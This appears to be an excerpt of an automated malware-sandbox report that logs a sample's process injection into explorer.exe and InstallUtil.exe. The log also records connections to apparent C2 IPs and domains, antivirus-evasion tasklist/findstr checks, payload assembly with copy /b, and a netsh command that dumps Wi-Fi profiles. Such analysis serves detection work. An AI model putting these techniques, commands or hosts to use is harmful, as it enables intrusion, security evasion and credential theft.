                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D07B408 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF73D07B408
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\explorer.exeFile created: 1600.exe.1.drJump to dropped file
                      Source: C:\Windows\explorer.exeNetwork Connect: 5.42.66.0 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 91.215.85.120 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.26.173 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 91.104.83.7 80Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_028F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,13_2_028F0110
                      Source: C:\Users\user\Desktop\987123.exeThread created: C:\Windows\explorer.exe EIP: 3161A88Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwThread created: unknown EIP: 3441A88Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwThread created: unknown EIP: 87C1A88
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeThread created: unknown EIP: 3421A30
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeMemory written: C:\Users\user\AppData\Local\Temp\4577.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif base: 233E02F0000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                      Source: 9D1E.exe, 00000019.00000002.2302320871.0000000003974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: blastechohackopeower.pw
                      Source: 9D1E.exe, 00000019.00000002.2302320871.0000000003974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: goddirtybrilliancece.fun
                      Source: 9D1E.exe, 00000019.00000002.2302320871.0000000003974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: drownthinsaltroutese.pw
                      Source: C:\Users\user\Desktop\987123.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifThread register set: target process: 2936Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45B000
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45F000
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 481000
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 731008
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 456000
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11F5008
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0ADAC8 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,21_2_00007FF73D0ADAC8
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004025A9 ShowWindow,BringWindowToTop,ShellExecuteExW,WaitForSingleObject,CloseHandle,8_2_004025A9
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BA0F8 SendInput,keybd_event,21_2_00007FF73D0BA0F8
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D5D84 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,21_2_00007FF73D0D5D84
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Advancement & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 15372Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Zoo + Viewers + Bow + Contractors + Protection + Desk + Kinds 15372\Far.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Payday + Corporate + Spain 15372\i Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif 15372\Far.pif 15372\i Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeProcess created: C:\Users\user\AppData\Local\Temp\4577.exe C:\Users\user\AppData\Local\Temp\4577.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2736 -ip 2736
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1160
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5968 -ip 5968
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 500
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe XXX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0AD25C GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,21_2_00007FF73D0AD25C
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0040493F AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_0040493F
                      Source: explorer.exe, 00000001.00000000.1693037249.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1695312230.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692042587.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000001.00000000.1692042587.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000001.00000000.1691821298.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                      Source: explorer.exe, 00000001.00000000.1692042587.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000001.00000000.1692042587.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041A0B0 cpuid 8_2_0041A0B0
                      Source: C:\Users\user\Desktop\987123.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00410850
                      Source: C:\Users\user\Desktop\987123.exeCode function: ___getlocaleinfo,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_0041147B
                      Source: C:\Users\user\Desktop\987123.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_004108BC
                      Source: C:\Users\user\Desktop\987123.exeCode function: GetLocaleInfoA,0_2_00417D72
                      Source: C:\Users\user\Desktop\987123.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00412E41
                      Source: C:\Users\user\Desktop\987123.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_00412A4C
                      Source: C:\Users\user\Desktop\987123.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoW,0_2_0040DA1D
                      Source: C:\Users\user\Desktop\987123.exeCode function: GetLocaleInfoW,0_2_0041068E
                      Source: C:\Users\user\Desktop\987123.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_004106A7
                      Source: C:\Users\user\Desktop\987123.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_00410F5D
                      Source: C:\Users\user\Desktop\987123.exeCode function: _LcidFromHexString,GetLocaleInfoA,0_2_00412B63
                      Source: C:\Users\user\Desktop\987123.exeCode function: EnumSystemLocalesA,0_2_00412F05
                      Source: C:\Users\user\Desktop\987123.exeCode function: GetLastError,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_00410711
                      Source: C:\Users\user\Desktop\987123.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,0_2_00412F2E
                      Source: C:\Users\user\Desktop\987123.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,__itoa_s,0_2_00412FD1
                      Source: C:\Users\user\Desktop\987123.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,0_2_00412BFB
                      Source: C:\Users\user\Desktop\987123.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,0_2_00412F95
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00410850
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: ___getlocaleinfo,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_0041147B
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_004108BC
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: GetLocaleInfoA,3_2_00417D72
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_00412E41
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_00412A4C
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoW,3_2_0040DA1D
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: GetLocaleInfoW,3_2_0041068E
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,3_2_004106A7
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,3_2_00410F5D
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: _LcidFromHexString,GetLocaleInfoA,3_2_00412B63
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: EnumSystemLocalesA,3_2_00412F05
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: GetLastError,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_00410711
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: _GetPrimaryLen,EnumSystemLocalesA,3_2_00412F2E
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,__itoa_s,3_2_00412FD1
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,3_2_00412BFB
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: _GetPrimaryLen,EnumSystemLocalesA,3_2_00412F95
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,GetEnvironmentVariableW,GetLastError,lstrcmpiW,SetLastError,lstrlenA,GetLocaleInfoW,MultiByteToWideChar,8_2_004041E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9D1E.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\E35F.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
